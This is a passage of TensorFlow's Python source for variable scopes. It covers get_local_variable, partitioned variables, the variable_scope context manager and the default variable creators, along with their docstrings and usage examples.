Defaults to `[%s]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known. For this to be used the initializer must be a Tensor and
not an initializer object.
use_resource: If False, creates a regular Variable. If true, creates an
experimental ResourceVariable instead with well-defined semantics.
Defaults to False (will later change to True). When eager execution is
enabled this argument is always forced to be True.
custom_getter: Callable that takes as a first argument the true getter, and
allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
  synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when violating reuse during variable creation, or when `initializer` dtype
and `dtype` don't match. Reuse is set inside `variable_scope`.
""")
get_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing variable with these parameters or create a new one.",
"",
"trainable: If `True` also add the variable to the graph collection\n"
" `GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).\n ",
"GraphKeys.GLOBAL_VARIABLES")
# The argument list for get_local_variable must match arguments to get_variable.
# So, if you are updating the arguments, also update arguments to get_variable.
@tf_export(v1=["get_local_variable"])
def get_local_variable( # pylint: disable=missing-docstring
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=False, # pylint: disable=unused-argument
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
  if collections:
    # Copy before appending so the caller's list is not mutated in place.
    collections = list(collections) + [ops.GraphKeys.LOCAL_VARIABLES]
  else:
    collections = [ops.GraphKeys.LOCAL_VARIABLES]
return get_variable(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=False,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation,
custom_getter=custom_getter,
constraint=constraint)
get_local_variable.__doc__ = get_variable_or_local_docstring % (
"Gets an existing *local* variable or creates a new one.",
"Behavior is the same as in `get_variable`, except that variables are\n"
"added to the `LOCAL_VARIABLES` collection and `trainable` is set to\n"
"`False`.\n",
"",
"GraphKeys.LOCAL_VARIABLES")
def _get_partitioned_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=True,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable instead which has well-defined semantics.
Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
Returns:
A tuple `(shards, partitions)` where `shards` is the list of `Variable`
shards and `partitions` is the output of the partitioner on the input
shape.
Raises:
ValueError: when creating a new variable and shape is not declared,
or when violating reuse during variable creation. Reuse is set inside
`variable_scope`.
"""
# pylint: disable=protected-access
scope = get_variable_scope()
if scope.custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % scope.custom_getter)
return scope._get_partitioned_variable(
_get_default_variable_store(), name, shape=shape, dtype=dtype,
initializer=initializer, regularizer=regularizer, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, constraint=constraint)
# pylint: enable=protected-access
# Named like a function for compatibility with the previous
# @tf_contextlib.contextmanager definition.
class _pure_variable_scope(object): # pylint: disable=invalid-name
"""A context for the variable_scope, see `variable_scope` for docs."""
def __init__(self,
name_or_scope,
reuse=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
old_name_scope=None,
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a context for the variable_scope, see `variable_scope` for docs.
Note: this does not create a name scope.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
reuse: `True` or None, or tf.AUTO_REUSE; if `None`, we inherit the parent
scope's reuse flag.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
old_name_scope: the original name scope when re-entering a variable scope.
dtype: type of the variables within this scope (defaults to `DT_FLOAT`).
use_resource: If False, variables in this scope will be regular Variables.
If True, experimental ResourceVariables will be created instead, with
well-defined semantics. Defaults to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
self._name_or_scope = name_or_scope
self._reuse = reuse
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._old_name_scope = old_name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
self._var_store = _get_default_variable_store()
self._var_scope_store = get_variable_scope_store()
if isinstance(self._name_or_scope, VariableScope):
self._new_name = self._name_or_scope.name
name_scope = self._name_or_scope._name_scope # pylint: disable=protected-access
# Handler for the case when we jump to a shared scope. We create a new
# VariableScope (self._var_scope_object) that contains a copy of the
# provided shared scope, possibly with changed reuse and initializer, if
# the user requested this.
variable_scope_object = VariableScope(
self._name_or_scope.reuse if not self._reuse else self._reuse,
name=self._new_name,
initializer=self._name_or_scope.initializer,
regularizer=self._name_or_scope.regularizer,
caching_device=self._name_or_scope.caching_device,
partitioner=self._name_or_scope.partitioner,
dtype=self._name_or_scope.dtype,
custom_getter=self._name_or_scope.custom_getter,
name_scope=name_scope,
use_resource=self._name_or_scope.use_resource,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(
self._custom_getter, self._name_or_scope.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._cached_variable_scope_object = variable_scope_object
def __enter__(self):
"""Begins the scope block.
Returns:
A VariableScope.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope, or if reuse is not `None` or `True`.
TypeError: when the types of some arguments are not appropriate.
"""
self._old = self._var_scope_store.current_scope
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.open_variable_scope(self._new_name)
self._old_subscopes = copy.copy(
self._var_scope_store.variable_scopes_count)
variable_scope_object = self._cached_variable_scope_object
else:
# Handler for the case when we just prolong current variable scope.
# VariableScope with name extended by the provided one, and inherited
# reuse and initializer (except if the user provided values to set).
self._new_name = (
self._old.name + "/" + self._name_or_scope if self._old.name
else self._name_or_scope)
self._reuse = (self._reuse
or self._old.reuse) # Re-using is inherited by sub-scopes.
if self._old_name_scope is None:
name_scope = self._name_or_scope
else:
name_scope = self._old_name_scope
variable_scope_object = VariableScope(
self._reuse,
name=self._new_name,
initializer=self._old.initializer,
regularizer=self._old.regularizer,
caching_device=self._old.caching_device,
partitioner=self._old.partitioner,
dtype=self._old.dtype,
use_resource=self._old.use_resource,
custom_getter=self._old.custom_getter,
name_scope=name_scope,
constraint=self._constraint)
if self._initializer is not None:
variable_scope_object.set_initializer(self._initializer)
if self._regularizer is not None:
variable_scope_object.set_regularizer(self._regularizer)
if self._caching_device is not None:
variable_scope_object.set_caching_device(self._caching_device)
if self._partitioner is not None:
variable_scope_object.set_partitioner(self._partitioner)
if self._custom_getter is not None:
variable_scope_object.set_custom_getter(
_maybe_wrap_custom_getter(self._custom_getter,
self._old.custom_getter))
if self._dtype is not None:
variable_scope_object.set_dtype(self._dtype)
if self._use_resource is not None:
variable_scope_object.set_use_resource(self._use_resource)
self._var_scope_store.open_variable_scope(self._new_name)
self._var_scope_store.current_scope = variable_scope_object
return variable_scope_object
def __exit__(self, type_arg, value_arg, traceback_arg):
# If jumping out from a non-prolonged scope, restore counts.
if isinstance(self._name_or_scope, VariableScope):
self._var_scope_store.variable_scopes_count = self._old_subscopes
else:
self._var_scope_store.close_variable_subscopes(self._new_name)
self._var_scope_store.current_scope = self._old
def _maybe_wrap_custom_getter(custom_getter, old_getter):
"""Wrap a call to a custom_getter to use the old_getter internally."""
if old_getter is None:
return custom_getter
# The new custom_getter should call the old one
def wrapped_custom_getter(getter, *args, **kwargs):
# Call:
# custom_getter(
# lambda: old_getter(true_getter, ...), *args, **kwargs)
# which means custom_getter will call old_getter, which
# will call the true_getter, perform any intermediate
# processing, and return the results to the current
# getter, which will also perform additional processing.
return custom_getter(
functools.partial(old_getter, getter),
*args, **kwargs)
return wrapped_custom_getter
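# Illustrative sketch (hypothetical getters, not part of the original
# module): when a scope with custom getter `inner` is re-entered with a
# new custom getter `outer`, the wrapper above composes them so that
# `outer` receives a callable which already routes through `inner`:
#
#   def inner(getter, *args, **kwargs):
#     return getter(*args, **kwargs)   # closest to the true getter
#
#   def outer(getter, *args, **kwargs):
#     return getter(*args, **kwargs)   # sees inner's result
#
#   combined = _maybe_wrap_custom_getter(outer, inner)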
def _get_unique_variable_scope(prefix):
"""Get a name with the given prefix unique in the current variable scope."""
var_scope_store = get_variable_scope_store()
current_scope = get_variable_scope()
name = current_scope.name + "/" + prefix if current_scope.name else prefix
if var_scope_store.variable_scope_count(name) == 0:
return prefix
idx = 1
while var_scope_store.variable_scope_count(name + ("_%d" % idx)) > 0:
idx += 1
return prefix + ("_%d" % idx)
# Named like a function for backwards compatibility with the
# @tf_contextlib.contextmanager version, which was switched to a class to avoid
# some object creation overhead.
@tf_export(v1=["variable_scope"]) # pylint: disable=invalid-name
class variable_scope(object):
"""A context manager for defining ops that creates variables (layers).
This context manager validates that the (optional) `values` are from the same
graph, ensures that graph is the default graph, and pushes a name scope and a
variable scope.
If `name_or_scope` is not None, it is used as is. If `name_or_scope` is None,
then `default_name` is used. In that case, if the same name has been
previously used in the same scope, it will be made unique by appending `_N`
to it.
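For example (an illustrative sketch):
```python
with tf.variable_scope(None, default_name="block") as s1:
  pass  # s1.name == "block"
with tf.variable_scope(None, default_name="block") as s2:
  pass  # s2.name == "block_1"
```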
Variable scope allows you to create new variables and to share already created
ones while providing checks to not create or share by accident. For details,
see the [Variable Scope How To](https://tensorflow.org/guide/variables); here
we present only a few basic examples.
Simple example of how to create a new variable:
```python
with tf.variable_scope("foo"):
with tf.variable_scope("bar"):
v = tf.get_variable("v", [1])
assert v.name == "foo/bar/v:0"
```
Simple example of how to reenter a premade variable scope safely:
```python
with tf.variable_scope("foo") as vs:
pass
# Re-enter the variable scope.
with tf.variable_scope(vs,
auxiliary_name_scope=False) as vs1:
# Restore the original name_scope.
with tf.name_scope(vs1.original_name_scope):
v = tf.get_variable("v", [1])
assert v.name == "foo/v:0"
c = tf.constant([1], name="c")
assert c.name == "foo/c:0"
```
Basic example of sharing a variable with AUTO_REUSE:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
Basic example of sharing a variable with reuse=True:
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
with tf.variable_scope("foo", reuse=True):
v1 = tf.get_variable("v", [1])
assert v1 == v
```
Sharing a variable by capturing a scope and setting reuse:
```python
with tf.variable_scope("foo") as scope:
v = tf.get_variable("v", [1])
scope.reuse_variables()
v1 = tf.get_variable("v", [1])
assert v1 == v
```
To prevent accidental sharing of variables, we raise an exception when getting
an existing variable in a non-reusing scope.
```python
with tf.variable_scope("foo"):
v = tf.get_variable("v", [1])
v1 = tf.get_variable("v", [1])
# Raises ValueError("... v already exists ...").
```
Similarly, we raise an exception when trying to get a variable that does not
exist in reuse mode.
```python
with tf.variable_scope("foo", reuse=True):
v = tf.get_variable("v", [1])
# Raises ValueError("... v does not exist ...").
```
Note that the `reuse` flag is inherited: if we open a reusing scope, then all
its sub-scopes become reusing as well.
A note about name scoping: Setting `reuse` does not impact the naming of other
ops such as mult. See related discussion on
[github#6189](https://github.com/tensorflow/tensorflow/issues/6189)
Note that up to and including version 1.0, it was allowed (though explicitly
discouraged) to pass False to the reuse argument, yielding undocumented
behaviour slightly different from None. Starting at 1.1.0 passing None and
False as reuse has exactly the same effect.
A note about using variable scopes in multi-threaded environment: Variable
scopes are thread local, so one thread will not see another thread's current
scope. Also, when using `default_name`, unique scope names are generated
only on a per-thread basis. If the same name was used within a different
thread, that doesn't prevent a new thread from creating the same scope.
However, the underlying variable store is shared across threads (within the
same graph). As such, if another thread tries to create a new variable with
the same name as a variable created by a previous thread, it will fail unless
reuse is True.
Further, each thread starts with an empty variable scope. So if you wish to
preserve name prefixes from a scope from the main thread, you should capture
the main thread's scope and re-enter it in each thread. For example:
```
main_thread_scope = variable_scope.get_variable_scope()
# Thread's target function:
def thread_target_fn(captured_scope):
with variable_scope.variable_scope(captured_scope):
# .... regular code for this thread
thread = threading.Thread(target=thread_target_fn, args=(main_thread_scope,))
```
"""
def __init__(self,
name_or_scope,
default_name=None,
values=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None,
auxiliary_name_scope=True):
"""Initialize the context manager.
Args:
name_or_scope: `string` or `VariableScope`: the scope to open.
default_name: The default name to use if the `name_or_scope` argument is
`None`, this name will be uniquified. If `name_or_scope` is provided it
won't be used, so it is not required and can be None.
values: The list of `Tensor` arguments that are passed to the op function.
initializer: default initializer for variables within this scope.
regularizer: default regularizer for variables within this scope.
caching_device: default caching device for variables within this scope.
partitioner: default partitioner for variables within this scope.
custom_getter: default custom getter for variables within this scope.
reuse: `True`, None, or tf.AUTO_REUSE; if `True`, we go into reuse mode
for this scope as well as all sub-scopes; if tf.AUTO_REUSE, we create
variables if they do not exist, and return them otherwise; if None, we
inherit the parent scope's reuse flag. When eager execution is enabled,
new variables are always created unless an EagerVariableStore or
template is currently active.
dtype: type of variables created in this scope (defaults to the type
in the passed scope, or inherited from parent scope).
use_resource: If False, all variables will be regular Variables. If True,
experimental ResourceVariables with well-defined semantics will be used
instead. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
auxiliary_name_scope: If `True`, we create an auxiliary name scope with
the scope. If `False`, we don't create it. Note that the argument is
not inherited, and it takes effect only once, when creating. You
should only use it for re-entering a premade variable scope.
Returns:
A scope that can be captured and reused.
Raises:
ValueError: when trying to reuse within a create scope, or create within
a reuse scope.
TypeError: when the types of some arguments are not appropriate.
"""
self._name_or_scope = name_or_scope
self._default_name = default_name
self._values = values
self._initializer = initializer
self._regularizer = regularizer
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._reuse = reuse
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if self._default_name is None and self._name_or_scope is None:
raise TypeError("If default_name is None then name_or_scope is required")
if self._reuse is False:
# We don't allow non-inheriting scopes, False = None here.
self._reuse = None
if not (self._reuse is True
or self._reuse is None
or self._reuse is AUTO_REUSE):
raise ValueError("The reuse parameter must be True or False or None.")
if self._values is None:
self._values = []
self._in_graph_mode = not context.executing_eagerly()
if self._in_graph_mode:
self._graph = ops._get_graph_from_inputs(self._values) # pylint: disable=protected-access
self._cached_pure_variable_scope = None
self._current_name_scope = None
if not isinstance(auxiliary_name_scope, bool):
raise TypeError("The auxiliary_name_scope must be `True` or `False`, "
"while get {}".format(auxiliary_name_scope))
self._auxiliary_name_scope = auxiliary_name_scope
def __enter__(self):
# If the default graph is building a function, then we should not replace it
# with the cached graph.
if ops.get_default_graph().building_function:
self._building_function = True
else:
self._building_function = False
if self._in_graph_mode and not self._building_function:
self._graph_context_manager = self._graph.as_default()
self._graph_context_manager.__enter__()
if self._cached_pure_variable_scope is not None:
# Fast path for re-entering variable_scopes. We've held on to the pure
# variable scope from a previous successful __enter__, so we avoid some
# overhead by re-using that object.
if self._current_name_scope is not None:
self._current_name_scope.__enter__()
return self._cached_pure_variable_scope.__enter__()
try:
return self._enter_scope_uncached()
except:
if not self._building_function:
if self._graph_context_manager is not None:
self._graph_context_manager.__exit__(*sys.exc_info())
raise
def _enter_scope_uncached(self):
"""Enters the context manager when there is no cached scope yet.
Returns:
The entered variable scope.
Raises:
TypeError: A wrong type is passed as `scope` at __init__().
ValueError: `reuse` is incorrectly set at __init__().
"""
if self._auxiliary_name_scope:
# Create a new name scope later
current_name_scope = None
else:
# Reenter the current name scope
name_scope = ops.get_name_scope()
if name_scope:
# Hack to reenter
name_scope += "/"
current_name_scope = ops.name_scope(name_scope)
else:
# Root scope
current_name_scope = ops.name_scope(name_scope)
# IMPORTANT: Only assign to self._cached_pure_variable_scope and
# self._current_name_scope after successful __enter__() calls.
if self._name_or_scope is not None:
if not isinstance(self._name_or_scope,
(VariableScope,) + six.string_types):
raise TypeError("VariableScope: name_or_scope must be a string or "
"VariableScope.")
if isinstance(self._name_or_scope, six.string_types):
name_scope = self._name_or_scope
else:
name_scope = self._name_or_scope.name.split("/")[-1]
if name_scope or current_name_scope:
current_name_scope = current_name_scope or ops.name_scope(name_scope)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
if isinstance(self._name_or_scope, six.string_types):
old_name_scope = current_name_scope_name
else:
old_name_scope = self._name_or_scope.original_name_scope
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=old_name_scope,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else:
self._current_name_scope = None
# This can only happen if someone is entering the root variable scope.
pure_variable_scope = _pure_variable_scope(
self._name_or_scope,
reuse=self._reuse,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
else: # Here name_or_scope is None. Using default name, but made unique.
if self._reuse:
raise ValueError("reuse=True cannot be used without a name_or_scope")
current_name_scope = current_name_scope or ops.name_scope(
self._default_name)
try:
current_name_scope_name = current_name_scope.__enter__()
except:
current_name_scope.__exit__(*sys.exc_info())
raise
self._current_name_scope = current_name_scope
unique_default_name = _get_unique_variable_scope(self._default_name)
pure_variable_scope = _pure_variable_scope(
unique_default_name,
initializer=self._initializer,
regularizer=self._regularizer,
caching_device=self._caching_device,
partitioner=self._partitioner,
custom_getter=self._custom_getter,
old_name_scope=current_name_scope_name,
dtype=self._dtype,
use_resource=self._use_resource,
constraint=self._constraint)
try:
entered_pure_variable_scope = pure_variable_scope.__enter__()
except:
pure_variable_scope.__exit__(*sys.exc_info())
raise
self._cached_pure_variable_scope = pure_variable_scope
return entered_pure_variable_scope
def __exit__(self, type_arg, value_arg, traceback_arg):
self._cached_pure_variable_scope.__exit__(
type_arg, value_arg, traceback_arg)
if self._current_name_scope:
self._current_name_scope.__exit__(type_arg, value_arg, traceback_arg)
if self._in_graph_mode and not self._building_function:
self._graph_context_manager.__exit__(type_arg, value_arg, traceback_arg)
# pylint: disable=g-doc-return-or-yield
@tf_export(v1=["variable_op_scope"])
@tf_contextlib.contextmanager
def variable_op_scope(values,
name_or_scope,
default_name=None,
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
reuse=None,
dtype=None,
use_resource=None,
constraint=None):
"""Deprecated: context manager for defining an op that creates variables."""
logging.warn("tf.variable_op_scope(values, name, default_name) is deprecated,"
" use tf.variable_scope(name, default_name, values)")
with variable_scope(name_or_scope,
default_name=default_name,
values=values,
initializer=initializer,
regularizer=regularizer,
caching_device=caching_device,
partitioner=partitioner,
custom_getter=custom_getter,
reuse=reuse,
dtype=dtype,
use_resource=use_resource,
constraint=constraint) as scope:
yield scope
def _compute_slice_dim_and_shape(full_shape, slicing):
"""Computes which dimension is being sliced and the typical slice shape."""
slice_shape = [0] * len(full_shape)
slice_dim = None
for dim, num_slices in enumerate(slicing):
dim_size = full_shape[dim]
if num_slices <= 0 or dim_size < num_slices:
raise ValueError("Cannot create %d slices for size %d. shape: %s, "
"slicing: %s" %
(num_slices, full_shape[dim], full_shape, slicing))
if num_slices == 1:
# Not slicing in this dimension.
slice_shape[dim] = dim_size
elif slice_dim is not None:
# We only support slicing along one of the dimensions.
raise ValueError("Can only slice a variable along one dimension: "
"shape: %s, slicing: %s" % (full_shape, slicing))
else:
# Note: We will add any extras onto the last slice, later.
slice_dim = dim
slice_shape[dim] = dim_size // num_slices
# Degenerate case: If "slicing" was all ones, pretend we are slicing along
# the first dimension.
if slice_dim is None:
slice_dim = 0
return slice_dim, slice_shape
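# Worked example (illustrative, added for clarity): full_shape=[4, 10]
# with slicing=[1, 5] slices only dimension 1 into 5 pieces, so
#   _compute_slice_dim_and_shape([4, 10], [1, 5]) == (1, [4, 2])
# and the caller appends any remainder onto the last slice.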
def _get_trainable_value(synchronization, trainable):
"""Computes the trainable value based on the given arguments."""
if synchronization == VariableSynchronization.ON_READ:
if trainable:
raise ValueError(
"Synchronization value can be set to "
"VariableSynchronization.ON_READ only for non-trainable variables. "
"You have specified trainable=True and "
"synchronization=VariableSynchronization.ON_READ.")
else:
# Set trainable to be false when variable is to be synced on read.
trainable = False
elif trainable is None:
trainable = True
return trainable
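# Behaviour sketch (illustrative, added for clarity):
#   _get_trainable_value(VariableSynchronization.AUTO, None)    -> True
#   _get_trainable_value(VariableSynchronization.ON_READ, None) -> False
#   _get_trainable_value(VariableSynchronization.ON_READ, True) -> raises ValueError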
def default_variable_creator(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
collections = kwargs.get("collections", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
expected_shape = kwargs.get("expected_shape", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
use_resource = kwargs.get("use_resource", None)
# Set trainable value based on synchronization value.
synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
if use_resource is None:
use_resource = get_variable_scope().use_resource
if use_resource is None:
use_resource = _DEFAULT_USE_RESOURCE
use_resource = use_resource or context.executing_eagerly()
if use_resource:
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
import_scope=import_scope)
else:
return variables.RefVariable(
initial_value=initial_value, trainable=trainable,
collections=collections, validate_shape=validate_shape,
caching_device=caching_device, name=name, dtype=dtype,
constraint=constraint, variable_def=variable_def,
expected_shape=expected_shape, import_scope=import_scope)
def default_variable_creator_v2(next_creator=None, **kwargs):
"""Default variable creator."""
assert next_creator is None
initial_value = kwargs.get("initial_value", None)
trainable = kwargs.get("trainable", None)
validate_shape = kwargs.get("validate_shape", True)
caching_device = kwargs.get("caching_device", None)
name = kwargs.get("name", None)
variable_def = kwargs.get("variable_def", None)
dtype = kwargs.get("dtype", None)
import_scope = kwargs.get("import_scope", None)
constraint = kwargs.get("constraint", None)
# Set trainable value based on synchronization value.
synchronization = kwargs.get("synchronization", VariableSynchronization.AUTO)
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
return resource_variable_ops.ResourceVariable(
initial_value=initial_value, trainable=trainable,
validate_shape=validate_shape, caching_device=caching_device,
name=name, dtype=dtype, constraint=constraint, variable_def=variable_def,
import_scope=import_scope)
variables.default_variable_creator = default_variable_creator
variables.default_variable_creator_v2 = default_variable_creator_v2
def _make_getter(captured_getter, captured_previous):
"""Gets around capturing loop variables in python being broken."""
return lambda **kwargs: captured_getter(captured_previous, **kwargs)
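# Why this helper exists (illustrative): a lambda defined inside a loop
# closes over the loop variables themselves, so every closure would see
# their final values. Routing through _make_getter binds each iteration's
# values at definition time (`creators` and `true_getter` are
# hypothetical names):
#
#   getter = true_getter
#   for creator in creators:
#     getter = _make_getter(creator, getter)  # each layer frozen correctly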
# TODO(apassos) remove forwarding symbol
variable = variables.VariableV1
@tf_export(v1=["variable_creator_scope"])
@tf_contextlib.contextmanager
def variable_creator_scope_v1(variable_creator):
"""Scope which defines a variable creation function to be used by variable().
variable_creator is expected to be a function with the following signature:
```
def variable_creator(next_creator, **kwargs)
```
The creator is supposed to eventually call the next_creator to create a
variable if it does want to create a variable and not call Variable or
ResourceVariable directly. This helps make creators composable. A creator may
choose to create multiple variables, return already existing variables, or
simply register that a variable was created and defer to the next creators in
line. Creators can also modify the keyword arguments seen by the next
creators.
Custom getters in the variable scope will eventually resolve down to these
custom creators when they do create variables.
The valid keyword arguments in kwds are:
initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
which is the initial value for the Variable. The initial value must have
a shape specified unless `validate_shape` is set to False. Can also be a
callable with no argument that returns the initial value when called. In
that case, `dtype` must be specified. (Note that initializer functions
from init_ops.py must first be bound to a shape before being used here.)
trainable: If `True`, the default, also adds the variable to the graph
collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
the default list of variables to use by the `Optimizer` classes.
`trainable` defaults to `True` unless `synchronization` is
set to `ON_READ`.
collections: List of graph collections keys. The new variable is added to
these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
validate_shape: If `False`, allows the variable to be initialized with a
